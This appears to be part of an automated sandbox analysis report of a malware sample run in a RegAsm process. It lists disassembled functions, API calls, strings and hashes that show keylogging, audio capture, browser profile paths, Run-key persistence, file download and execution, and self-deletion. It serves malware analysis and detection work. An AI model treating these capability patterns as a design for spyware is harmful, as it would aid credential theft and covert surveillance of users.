                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                • String ID: image/png
                                                                • API String ID: 1291196975-2966254431
                                                                • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 481472006-1507639952
                                                                • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                APIs
                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadFileSleep
                                                                • String ID: !D@
                                                                • API String ID: 1931167962-604454484
                                                                • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _strlen
                                                                • String ID: : $Se.
                                                                • API String ID: 4218353326-4089948878
                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                • API String ID: 481472006-2430845779
                                                                • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: alarm.wav$hYG
                                                                • API String ID: 1174141254-2782910960
                                                                • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                • String ID: Online Keylogger Stopped
                                                                • API String ID: 1623830855-1496645233
                                                                • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                • String ID: Unknown exception
                                                                • API String ID: 3476068407-410509341
                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                APIs
                                                                • waveInPrepareHeader.WINMM(008F91F8,00000020,?), ref: 00401849
                                                                • waveInAddBuffer.WINMM(008F91F8,00000020), ref: 0040185F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferHeaderPrepare
                                                                • String ID: XMG
                                                                • API String ID: 2315374483-813777761
                                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                APIs
                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocaleValid
                                                                • String ID: IsValidLocaleName$kKD
                                                                • API String ID: 1901932003-3269126172
                                                                • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                • API String ID: 1174141254-4188645398
                                                                • Opcode ID: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                • Opcode Fuzzy Hash: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                • API String ID: 1174141254-2800177040
                                                                • Opcode ID: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                • Opcode Fuzzy Hash: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                • API String ID: 1174141254-1629609700
                                                                • Opcode ID: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                • Opcode Fuzzy Hash: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                APIs
                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                • String ID: [AltL]$[AltR]
                                                                • API String ID: 2738857842-2658077756
                                                                • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: !D@$open
                                                                • API String ID: 587946157-1586967515
                                                                • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                APIs
                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State
                                                                • String ID: [CtrlL]$[CtrlR]
                                                                • API String ID: 1649606143-2446555240
                                                                • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 1881088180-2015055088
                                                                • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                APIs
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteOpenValue
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                • API String ID: 2654517830-1051519024
                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                APIs
                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteDirectoryFileRemove
                                                                • String ID: pth_unenc
                                                                • API String ID: 3325800564-4028850238
                                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                APIs
                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                • String ID: pth_unenc
                                                                • API String ID: 1872346434-4028850238
                                                                • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                • String ID:
                                                                • API String ID: 1717984340-0
                                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                APIs
                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411F2B), ref: 00411BC7
                                                                • IsBadReadPtr.KERNEL32(?,00000014,00411F2B), ref: 00411C93
                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastRead
                                                                • String ID:
                                                                • API String ID: 4100373531-0
                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                Execution Graph

                                                                Execution Coverage:5.7%
                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:2000
                                                                Total number of Limit Nodes:60
